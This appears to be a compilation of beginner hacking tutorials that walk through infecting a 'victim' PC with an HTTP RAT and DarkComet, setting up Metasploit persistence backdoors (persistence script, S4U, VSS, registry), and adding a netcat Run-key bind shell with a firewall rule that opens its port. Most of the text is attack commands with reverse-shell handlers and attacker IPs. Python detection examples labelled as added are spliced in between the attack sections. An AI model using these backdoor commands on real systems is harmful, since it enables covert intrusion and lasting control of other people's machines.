HTTP RAT Tutorial for Beginners

HTTP RAT is a kind of Remote Access Trojan that uses a web interface and port 80 to gain access. It can be understood simply as an HTTP tunnel, except that it works in the reverse direction. These Trojans are comparatively more dangerous because they work over the web and thus work almost anywhere there is internet access.

Here, we will be working with the HTTP RAT backdoor web server by a zombie.

Download the above from the internet and extract the tool. It should look something like the picture below.

Double click on the folder and click on the icon with httprat written next to it. Something like this pic pops up on the screen.

Click on create. This is what should pop out on screen.

An icon-less application named httpserver should have been created, as in this picture:

Send this file to the victim via pen drive or any other means. Once the victim double-clicks the application, it will automatically send a connection back to you. You just need to type the victim's IP address in the browser. This is what will appear on the screen.

Author: Shivam Yadav is a hacking enthusiast, a learner and a researcher in this field.

5 ways to Create Permanent Backdoor in Remote PC

First take the meterpreter shell from any known exploit and bypass UAC for better results. Then run the command:

Persistence

run persistence -X -i 10 -p 443 -r 192.168.0.105

-X=connect back when the system boots

-i 10=try to connect back every 10 seconds

-p 443=reverse connection port

-r ip=reverse connection ip

After successfully executing the script, reboot the system and then use exploit:

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lport 443

set lhost 192.168.0.105

exploit
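Added example (not part of the original tutorial): a defender-side check for the fixed-interval callback that the -i option produces, written in Python. It groups connection attempts by flow and flags flows whose gaps are nearly constant; the event tuple layout, the thresholds and the sample records are assumptions made for this illustration.

```python
from collections import defaultdict
from statistics import mean, pstdev

def find_beacons(events, min_events=6, max_cv=0.1):
    """Return [((src, dst, dport), mean_gap_seconds)] for flows with near-constant gaps.

    events: iterable of (epoch_seconds, src, dst, dport) connection attempts.
    max_cv: highest allowed coefficient of variation (stdev / mean) of the gaps.
    """
    flows = defaultdict(list)
    for ts, src, dst, dport in events:
        flows[(src, dst, dport)].append(ts)
    beacons = []
    for flow, stamps in flows.items():
        if len(stamps) < min_events:
            continue  # too few attempts to judge regularity
        stamps.sort()
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        if avg > 0 and pstdev(gaps) / avg <= max_cv:
            beacons.append((flow, round(avg, 1)))
    return beacons

# Constructed sample: one host retrying 192.168.0.105:443 about every 10 s
# (the -i 10 / -p 443 / -r values shown above) next to irregular web traffic.
SAMPLE_EVENTS = [
    (0.0, "10.0.0.23", "192.168.0.105", 443), (3.0, "10.0.0.23", "203.0.113.10", 443),
    (10.0, "10.0.0.23", "192.168.0.105", 443), (4.0, "10.0.0.23", "203.0.113.10", 443),
    (20.1, "10.0.0.23", "192.168.0.105", 443), (40.0, "10.0.0.23", "203.0.113.10", 443),
    (30.0, "10.0.0.23", "192.168.0.105", 443), (41.0, "10.0.0.23", "203.0.113.10", 443),
    (39.9, "10.0.0.23", "192.168.0.105", 443), (95.0, "10.0.0.23", "203.0.113.10", 443),
    (50.0, "10.0.0.23", "192.168.0.105", 443), (200.0, "10.0.0.23", "203.0.113.10", 443),
]

if __name__ == "__main__":
    for flow, gap in find_beacons(SAMPLE_EVENTS):
        print("regular callback", flow, "every", gap, "s")
```

Feed it firewall or proxy connection records from a workstation subnet; a flow that repeats at a constant interval to a single address after every reboot is worth triaging.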

s4u_persistence

Creates a scheduled task that will run using service-for-user (S4U). This allows the scheduled task to run even as an unprivileged user that is not logged into the device. This will result in lower security context, allowing access to local resources only. The module requires ‘Logon as a batch job’ permissions (SeBatchLogonRight)

Now type use exploit/windows/local/s4u_persistence

msf exploit (s4u_persistence)>set payload windows/meterpreter/reverse_tcp

msf exploit (s4u_persistence)>set lhost 192.168.0.137 (IP address of kali Linux)

msf exploit (s4u_persistence)>set lport 443

msf exploit (s4u_persistence)>set trigger logon

msf exploit (s4u_persistence)>set session 2

msf exploit (s4u_persistence)>exploit

Now, after successful backdoor creation, restart the victim PC. You can see that the previous meterpreter session is closed. Then run the commands:

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.137

exploit
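Added example (not part of the original tutorial): a Python check that reviews a Task Scheduler XML definition for the combination described above, an S4U principal with a logon trigger and an executable outside the usual system directories. Task XML is stored under C:\Windows\System32\Tasks and is carried in Security event 4698 when task-creation auditing is enabled; the trusted-path list and both sample tasks are assumptions constructed for this illustration.

```python
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
# Assumption: directories where legitimately scheduled binaries normally live.
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

def review_task(task_xml):
    """Return a list of findings for one Task Scheduler XML definition."""
    root = ET.fromstring(task_xml)
    findings = []
    logon_types = [e.text for e in root.findall("t:Principals/t:Principal/t:LogonType", NS)]
    if "S4U" in logon_types:
        findings.append("runs via S4U (no stored password, user need not be logged on)")
    if root.find("t:Triggers/t:LogonTrigger", NS) is not None:
        findings.append("fires at user logon")
    for cmd in root.findall("t:Actions/t:Exec/t:Command", NS):
        path = (cmd.text or "").strip().strip('"').lower()
        if not path.startswith(TRUSTED_PREFIXES):
            findings.append("executes from non-standard path: " + path)
    return findings

# Constructed samples (XML declaration omitted so the text parses as a str).
SUSPECT_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Principals><Principal id="Author">
    <UserId>LAB\user1</UserId><LogonType>S4U</LogonType>
  </Principal></Principals>
  <Actions Context="Author"><Exec>
    <Command>C:\Users\user1\AppData\Local\Temp\example.exe</Command>
  </Exec></Actions>
</Task>"""

BENIGN_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><Enabled>true</Enabled></CalendarTrigger></Triggers>
  <Principals><Principal id="Author">
    <UserId>LAB\user1</UserId><LogonType>InteractiveToken</LogonType>
  </Principal></Principals>
  <Actions Context="Author"><Exec>
    <Command>C:\Windows\System32\defrag.exe</Command>
  </Exec></Actions>
</Task>"""

if __name__ == "__main__":
    print(review_task(SUSPECT_TASK))
```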

VSS_PERSISTENCE

This module will attempt to create a persistent payload in a new volume shadow copy. This is based on the VSSOwn Script originally posted by Tim Tomes and Mark Baggett. This module has been tested successfully on Windows 7. In order to achieve persistence through the RUNKEY option, the user should need a password in order to start a session on the target machine.

First take the meterpreter shell and bypass UAC by any known technique, and then background the session. Then run this series of commands:

Now type use exploit/windows/local/vss_persistence

msf exploit (vss_persistence)>set runkey true

msf exploit (vss_persistence)>set schtask true

msf exploit (vss_persistence)>set rhost 192.168.222.137

msf exploit (vss_persistence)>set session 2

msf exploit (vss_persistence)>exploit

Now run exploit which will create a backdoor and will give a meterpreter session.

Now background it and use the multi handler and also set the payload with commands:

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.222.135

set lport 4444

exploit

Now restart the victim system and the meterpreter session will die. After the system has restarted, run exploit and it will give a reverse meterpreter shell.

REGISTRY PERSISTENCE

This module will install a payload that is executed during boot. It will be executed either at user logon or at system startup via the registry value in "CurrentVersion\Run" (depending on privilege and selected method). The payload will be installed completely in the registry.

First background the meterpreter session and then run commands:

Now type use exploit/windows/local/registry_persistence

msf exploit (registry_persistence)>set payload windows/meterpreter/reverse_tcp

msf exploit (registry_persistence)>set lhost 192.168.222.135 (IP address of kali Linux)

msf exploit (registry_persistence)>set lport 4545

msf exploit (registry_persistence)>set startup system

msf exploit (registry_persistence)>set session 1

msf exploit (registry_persistence)>exploit

Now set up your system for the reverse connection. Run the following commands in your msfconsole:

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.222.135

set lport 4545

exploit

Now restart the victim PC and your previous meterpreter session will die, so now run the exploit. After restarting, you will get the reverse meterpreter shell, as you can see in my case.

NETCAT

Netcat is a featured networking utility which reads and writes data across network connections, using the TCP/IP protocol.

After getting the meterpreter shell and bypassing UAC run the following command:

upload /usr/share/windows-binaries/nc.exe C:\\Windows\\system32

Now set the registry value with the following command:

reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v netcat -d 'C:\windows\system32\nc.exe -Ldp 4445 -e cmd.exe'

Now get the command shell with the command:

shell

Then bypass the firewall on the victim system by adding a firewall rule with the shell command:

netsh advfirewall firewall add rule name='netcat' dir=in action=allow protocol=Tcp localport=4445

Now check whether the rules are added successfully with the command:

netsh firewall show portopening

As you can see, the firewall rule netcat is added successfully.

Now, after restarting the victim system, run the following command in the terminal:

nc -nv 192.168.0.101 4445

Here 192.168.0.101 is the victim system on which you previously created the backdoor, and 4445 is the port you gave while setting the registry value.

After successfully running the command you will get the command shell.
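Added example (not part of the original tutorial): a Python audit that covers both the registry persistence and the netcat sections from the defender's side. It parses `reg query` output for Run values that serve a shell on a listener, parses `netsh advfirewall firewall show rule name=all` output for enabled inbound allow rules, and reports where the two agree on a port. The sample command output is constructed, and the flag heuristics are assumptions tuned to the command line shown above.

```python
import re

RUN_LINE = re.compile(r"^\s{4}(?P<name>.+?)\s{4}REG_\w+\s{4}(?P<data>.*)$")

def suspicious_run_values(reg_output):
    """Map Run value name -> listen port for values that serve a shell on a listener."""
    hits = {}
    for m in filter(None, map(RUN_LINE.match, reg_output.splitlines())):
        data = m.group("data").lower()
        serves_shell = re.search(r"\s-e\s+\S*(cmd|powershell)\.exe", data)
        listens = re.search(r"\s-[a-z]*l[a-z]*\b", data)
        port = re.search(r"\s-[a-z]*p\s+(\d+)", data)
        if serves_shell and listens:
            hits[m.group("name")] = int(port.group(1)) if port else None
    return hits

def inbound_allow_ports(netsh_output):
    """Map local port -> rule name for enabled inbound allow rules."""
    ports, rule = {}, {}
    for line in netsh_output.splitlines() + ["Rule Name:"]:  # sentinel flushes last rule
        key, sep, value = line.partition(":")
        if not sep:
            continue  # separator rows and blank lines
        if key.strip() == "Rule Name":
            if [rule.get(k) for k in ("Enabled", "Direction", "Action")] == ["Yes", "In", "Allow"]:
                for p in rule.get("LocalPort", "").split(","):
                    if p.isdigit():
                        ports[int(p)] = rule["Rule Name"]
            rule = {}
        rule[key.strip()] = value.strip()
    return ports

def correlate(reg_output, netsh_output):
    """Return (value name, port, firewall rule) where both artefacts agree on the port."""
    opened = inbound_allow_ports(netsh_output)
    return [(n, p, opened[p]) for n, p in suspicious_run_values(reg_output).items() if p in opened]

# Constructed sample of `reg query` output for the HKLM Run key.
SAMPLE_REG = r"""HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    netcat    REG_SZ    C:\windows\system32\nc.exe -Ldp 4445 -e cmd.exe"""

# Constructed sample of `netsh advfirewall firewall show rule name=all` output.
SAMPLE_NETSH = """Rule Name:                            netcat
----------------------------------------------------------------------
Enabled:                              Yes
Direction:                            In
LocalPort:                            4445
Action:                               Allow"""
```

Port ranges and the value Any in LocalPort are ignored by this parser, so treat an empty result as "no exact match" rather than as a clean bill of health.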

Hack Windows Server in Network using Atelier Web Remote Command

Every geek, system administrator and help-desk person loves being able to access computers or laptops remotely, but we also know that accessing a computer remotely normally requires installing the same software on the remote computer as well as on our own. Atelier Web Remote Commander (AWRC) is a powerful tool for geeks and system administrators because it can connect to other computers without installing any software and without any configuration on the remote computer.

Atelier Web Remote Commander (AWRC) Features:

  • Runs across firewalls.
  • Performs deep audits and all kinds of maintenance operations.
  • Does not leave traces on remote. It is absolutely safe.
  • Zero configuration simultaneous connections.

Now let's see this tool working in practice.

Download Atelier Web Remote Commander, install it and open it.

In the Remote Host field, type the IP address of the computer or server to which you want a remote desktop connection. After that, enter the User Name and Password and click on Connect.

After a few seconds, you can see the desktop of the remote computer appear in front of you. Now you can see information about the remote system and access the files of the remote computer.

Go to the SysInfo tab; here you see all information related to the remote computer, like the version of the running OS, BIOS information, details of memory, etc.

In the NetworkInfo section, you will get the most interesting information about the remote system, like the routing table, running protocols, open ports, IP statistics, etc.

The FileSystem tab will give you access to the file system of the remote computer, where you can access all files and data on all drives.

The UserGroup section will give you details of all created accounts, their privileges and the groups to which each user account belongs.

If you want to chat with or tell something to the remote computer's user, you can also do that: simply start the Chat window, type whatever you want to say and hit Enter.

Output on the remote victim's computer.

Author: AkshayBhardwaj is a passionate Hacker, Information Security Researcher | Sketch Artist | Technical writer.

Hack Remote PC using Darkcomet RAT with Metasploit

Download DarkComet RAT. After downloading it, unzip the archive file.

Change to the DarkComet directory and type "wine DarkComet.exe".

First open DARKCOMET RAT and click on 'I Accept' (bottom right side of the screen).

In the next screen click on DARKCOMET RAT, then select the Server module option and click on Minimalist.

This option displays a form. Fill in the ID with your name, the IP Address and the desired Port No. Also add the destination path where you want to save the .exe file, then click on Normal.

Now save it on your desktop.

Again open DARKCOMET RAT and select the listen to new port option.

Now enter the port number used in the form above and click on Listen.

Now hack the victim's PC using Metasploit (see: How to Hack Remote PC).

Now you'll get a meterpreter session on the victim's PC. Use the upload command to upload the backdoor exe file which you created using DarkComet:

upload /root/Desktop/updates.exe d:\\

Now type shell to get the command prompt of the victim's PC, and run the uploaded exe file.

Now you can get the session of the victim's PC. See the screenshot below:

Click on system info and you can see the whole system information of the victim's PC.